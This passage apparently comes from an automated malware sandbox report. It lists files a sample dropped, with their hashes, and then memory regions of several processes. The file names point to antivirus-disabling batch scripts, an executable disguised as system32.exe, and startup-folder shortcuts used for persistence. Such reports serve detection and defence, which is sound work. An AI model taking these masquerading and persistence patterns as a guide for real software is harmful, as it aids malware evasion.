                                                            f32061ab690ebd313d44befeef2e6ffb06b30fd3ece7a09d57aff142d0c9507562275f6efce23c9a199324ff77ed98d3641596fd80eb3e2adebcb031473dbfa8

                                                          • C:\Users\Admin\AppData\Local\Temp\avdisable.bat

                                                            Filesize

                                                            3KB

                                                            MD5

                                                            4c35b71d2d89c8e8eb773854085c56ea

                                                            SHA1

                                                            ede16731e61348432c85ef13df4beb2be8096d9b

                                                            SHA256

                                                            3efeeaaabfd33ff95934bee4d6d84e4ecb158d1e7777f6eecd26b2746991ed42

                                                            SHA512

                                                            a6ccbb2913738ca171686a2dd70e96330b0972dadb64f7294ac2b4c9bb430c872ed2bcd360f778962162b9e3be305836fa7f6762b46310c0ad4d6ef0c1cdac8d

                                                          • C:\Users\Admin\AppData\Local\Temp\clear_av.bat

                                                            Filesize

                                                            5KB

                                                            MD5

                                                            48d1db006fe2ae378b0f7efd561d7e56

                                                            SHA1

                                                            63df10216f0ad81d1d42dd2fc8c4483be5d077fc

                                                            SHA256

                                                            65428112138dff324acd39babd902959dbb78b6ed74a276a1d3c9993ae52847a

                                                            SHA512

                                                            079fa75df35b8fea18fb220b3f005d6384b28aedb2e5ae62ddd3f6db6abda7dbab091fd44d05dffb4ec41657e052f379267eef7c5126fd8bd7eb189f147806f5

                                                          • C:\Users\Admin\AppData\Local\Temp\system32.exe

                                                            Filesize

                                                            2.3MB

                                                            MD5

                                                            b198b92325d73a7b4994a481be7cf337

                                                            SHA1

                                                            1b1d72d1a5ac6e90c8daaa160b210903cfc76f5c

                                                            SHA256

                                                            e5c0819c18a018b6e77e27c9c7d05050dd8a45c0a2bd8ab08aaf19fff35c3c92

                                                            SHA512

                                                            d18316f3c5ef53716ba26bc01105ef4192cf94fd04e02fb3433222962649d279e8052305f101d516617821c620e8c189379f143333a6995f51de1a4f168a56a9

                                                          • C:\Users\Admin\AppData\Local\Temp\tmp43CA.tmp.bat

                                                            Filesize

                                                            170B

                                                            MD5

                                                            d02e8edf85072682f8e930ed74ab54d5

                                                            SHA1

                                                            f418e3ebe6237ee664979698dd57b9cf3075ecd8

                                                            SHA256

                                                            28093a22228d3cc20536859b57f3a69a75777346c26279474da69e87e6d67e6f

                                                            SHA512

                                                            10a9736f1b1ecdb98bcd5c4c2b17e89dc2542b6aed6f268b36c30277fdea0d1d556498807b31af7d9c48351323eb2444de1cd1a3dd7c9c160dd700e66cdde6bb

                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FunCheker.lnk

                                                            Filesize

                                                            816B

                                                            MD5

                                                            ea9102448cb591eb842aefe80cfd3a7a

                                                            SHA1

                                                            77c38b54fb2548a63af23d50accfc17f9f3c685e

                                                            SHA256

                                                            f9cd58e6f39d7c22b0b884fbf03f8108eaf2c7a1d9c343c60e2c45fffd03d995

                                                            SHA512

                                                            b88ce9c296d4f0085c2dbff5e33ce89a9348a715bd2b13a0b3ce32d290885c8250e38ae837a4807b0703ad5f319de2d1d23af9e1b41b521b30652c1634dae6d4

                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft OneDrive.lnk

                                                            Filesize

                                                            673B

                                                            MD5

                                                            91a2998a0fa8ecd75119753ec3132a30

                                                            SHA1

                                                            7cf6e24e75267344cb2b4a9407dc9aaec9811dc8

                                                            SHA256

                                                            9b8018c520d948440ee21c729c98e2886d91334f6ec090fdc6f7c43cce4aa216

                                                            SHA512

                                                            c900b0da721cfb4606d568f16f756c4735185d664913a285335f29ab7b788f109ea028cb5e534ac93dcca972b059785cab289525ac4413603aae5dbb4612bde0

                                                          • memory/348-1825-0x000000006F860000-0x000000006F8AB000-memory.dmp

                                                            Filesize

                                                            300KB

                                                          • memory/424-56-0x0000000007810000-0x0000000007832000-memory.dmp

                                                            Filesize

                                                            136KB

                                                          • memory/424-87-0x0000000009DA0000-0x0000000009E34000-memory.dmp

                                                            Filesize

                                                            592KB

                                                          • memory/424-299-0x0000000009D30000-0x0000000009D38000-memory.dmp

                                                            Filesize

                                                            32KB

                                                          • memory/424-55-0x0000000007940000-0x0000000007F68000-memory.dmp

                                                            Filesize

                                                            6.2MB

                                                          • memory/424-54-0x0000000007230000-0x0000000007266000-memory.dmp

                                                            Filesize

                                                            216KB

                                                          • memory/424-294-0x0000000009D40000-0x0000000009D5A000-memory.dmp

                                                            Filesize

                                                            104KB

                                                          • memory/424-58-0x0000000008050000-0x00000000080B6000-memory.dmp

                                                            Filesize

                                                            408KB

                                                          • memory/424-57-0x0000000007FE0000-0x0000000008046000-memory.dmp

                                                            Filesize

                                                            408KB

                                                          • memory/424-59-0x00000000082A0000-0x00000000085F0000-memory.dmp

                                                            Filesize

                                                            3.3MB

                                                          • memory/424-60-0x00000000086B0000-0x00000000086CC000-memory.dmp

                                                            Filesize

                                                            112KB

                                                          • memory/424-61-0x00000000086D0000-0x000000000871B000-memory.dmp

                                                            Filesize

                                                            300KB

                                                          • memory/424-62-0x0000000008A00000-0x0000000008A76000-memory.dmp

                                                            Filesize

                                                            472KB

                                                          • memory/424-86-0x0000000009C00000-0x0000000009CA5000-memory.dmp

                                                            Filesize

                                                            660KB

                                                          • memory/424-79-0x0000000009AD0000-0x0000000009B03000-memory.dmp

                                                            Filesize

                                                            204KB

                                                          • memory/424-80-0x000000006F860000-0x000000006F8AB000-memory.dmp

                                                            Filesize

                                                            300KB

                                                          • memory/424-81-0x0000000009870000-0x000000000988E000-memory.dmp

                                                            Filesize

                                                            120KB

                                                          • memory/848-2313-0x00000000099A0000-0x00000000099AC000-memory.dmp

                                                            Filesize

                                                            48KB

                                                          • memory/848-32-0x0000000001390000-0x0000000001914000-memory.dmp

                                                            Filesize

                                                            5.5MB

                                                          • memory/848-2321-0x0000000001390000-0x0000000001914000-memory.dmp

                                                            Filesize

                                                            5.5MB

                                                          • memory/848-43-0x0000000001390000-0x0000000001914000-memory.dmp

                                                            Filesize

                                                            5.5MB

                                                          • memory/848-2309-0x0000000001390000-0x0000000001914000-memory.dmp

                                                            Filesize

                                                            5.5MB

                                                          • memory/848-45-0x0000000001390000-0x0000000001914000-memory.dmp

                                                            Filesize

                                                            5.5MB

                                                          • memory/848-47-0x00000000071F0000-0x000000000728C000-memory.dmp

                                                            Filesize

                                                            624KB

                                                          • memory/1372-939-0x000000006F860000-0x000000006F8AB000-memory.dmp

                                                            Filesize

                                                            300KB

                                                          • memory/1420-48-0x0000000000FD0000-0x0000000001590000-memory.dmp

                                                            Filesize

                                                            5.8MB

                                                          • memory/1420-35-0x0000000000FD0000-0x0000000001590000-memory.dmp

                                                            Filesize

                                                            5.8MB

                                                          • memory/1420-49-0x0000000000FD0000-0x0000000001590000-memory.dmp

                                                            Filesize

                                                            5.8MB

                                                          • memory/1420-2297-0x0000000008810000-0x000000000881A000-memory.dmp

                                                            Filesize

                                                            40KB

                                                          • memory/1420-2310-0x0000000000FD0000-0x0000000001590000-memory.dmp

                                                            Filesize

                                                            5.8MB

                                                          • memory/1488-324-0x000000006F860000-0x000000006F8AB000-memory.dmp

                                                            Filesize

                                                            300KB

                                                          • memory/1696-405-0x000000006F860000-0x000000006F8AB000-memory.dmp

                                                            Filesize

                                                            300KB

                                                          • memory/2184-946-0x0000000009750000-0x000000000976A000-memory.dmp

                                                            Filesize

                                                            104KB

                                                          • memory/2184-947-0x00000000097D0000-0x00000000097F2000-memory.dmp

                                                            Filesize

                                                            136KB

                                                          • memory/2280-44-0x0000000007600000-0x0000000007692000-memory.dmp

                                                            Filesize

                                                            584KB

                                                          • memory/2280-42-0x0000000001270000-0x000000000185A000-memory.dmp

                                                            Filesize

                                                            5.9MB

                                                          • memory/2280-25-0x0000000001270000-0x000000000185A000-memory.dmp

                                                            Filesize

                                                            5.9MB

                                                          • memory/2280-1651-0x00000000090D0000-0x00000000090DA000-memory.dmp

                                                            Filesize

                                                            40KB

                                                          • memory/2280-1652-0x0000000009430000-0x0000000009442000-memory.dmp

                                                            Filesize

                                                            72KB

                                                          • memory/2280-2305-0x0000000001270000-0x000000000185A000-memory.dmp

                                                            Filesize

                                                            5.9MB

                                                          • memory/2280-794-0x00000000090B0000-0x00000000090CE000-memory.dmp

                                                            Filesize

                                                            120KB

                                                          • memory/2280-793-0x0000000008E50000-0x0000000008EA0000-memory.dmp

                                                            Filesize

                                                            320KB

                                                          • memory/2280-46-0x0000000007BA0000-0x000000000809E000-memory.dmp

                                                            Filesize

                                                            5.0MB

                                                          • memory/2280-41-0x0000000001270000-0x000000000185A000-memory.dmp

                                                            Filesize

                                                            5.9MB

                                                          • memory/3292-2051-0x000000006F860000-0x000000006F8AB000-memory.dmp

                                                            Filesize

                                                            300KB

                                                          • memory/3596-1358-0x000000006F860000-0x000000006F8AB000-memory.dmp

                                                            Filesize

                                                            300KB

                                                          • memory/3604-51-0x00007FFB689D0000-0x00007FFB693BC000-memory.dmp

                                                            Filesize

                                                            9.9MB

                                                          • memory/3604-0-0x00007FFB689D3000-0x00007FFB689D4000-memory.dmp

                                                            Filesize

                                                            4KB

                                                          • memory/3604-4-0x00007FFB689D0000-0x00007FFB693BC000-memory.dmp

                                                            Filesize

                                                            9.9MB

                                                          • memory/3604-3-0x00007FFB689D0000-0x00007FFB693BC000-memory.dmp

                                                            Filesize

                                                            9.9MB

                                                          • memory/3604-2-0x00007FFB689D0000-0x00007FFB693BC000-memory.dmp

                                                            Filesize

                                                            9.9MB

                                                          • memory/3604-1-0x0000000000F80000-0x00000000023DC000-memory.dmp

                                                            Filesize

                                                            20.4MB

                                                          • memory/4160-836-0x000000006F860000-0x000000006F8AB000-memory.dmp

                                                            Filesize

                                                            300KB

                                                          • memory/4960-1439-0x000000006F860000-0x000000006F8AB000-memory.dmp

                                                            Filesize

                                                            300KB